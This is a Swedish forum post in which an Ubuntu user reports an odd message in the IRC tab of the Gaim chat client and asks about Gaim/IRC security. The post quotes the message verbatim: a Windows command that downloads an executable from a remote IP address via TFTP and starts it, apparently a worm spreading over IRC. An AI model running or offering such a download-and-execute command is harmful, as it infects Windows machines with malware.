Jag haft Ubuntu i lite drygt ett halvår och idag när jag kom hem från skolan blev jag glad att jag bytte operativsystem den där varma april/maj-dagen för ett år sedan. I mitt öppna gaimfönster stod det nämligen:
Kod: Markera allt
(21.43.59) Sprak: %comspec% /c tftp -i 68.43.148.121 GET bpgiatlu.exe & start bpgiatlu
Det skumma att det dök bara upp i IRC-tabben - inte i någon av de MSN-fönster som jag hade öppna?
Någon som har varit med om något liknade/Vet något om säkerheten i gaim/irc?
För att undanröja en möjlig komspirationteori så innehar jag en enda nyckel inom 10 mils radie till min dörr och ja, dörren var låst när jag kom hem.
Konspirationteori nr2: Man kan ssh:a sig in på min dator och jag har en Vncserver igång - men sedan jag installerade beryl så har den inte fungerat. Kvar finns då att på något sätt kunna skriva kommentarer i gaim via terminalen, men för att kunna göra det måste personen i fråga knäcka ytterligare ett lösenord till och det känns inte som om det riktigt är värt det.
Kvar bland konspirationsteorierna är att min vaktmästare låst upp dörren bara för att skriva det meddelandet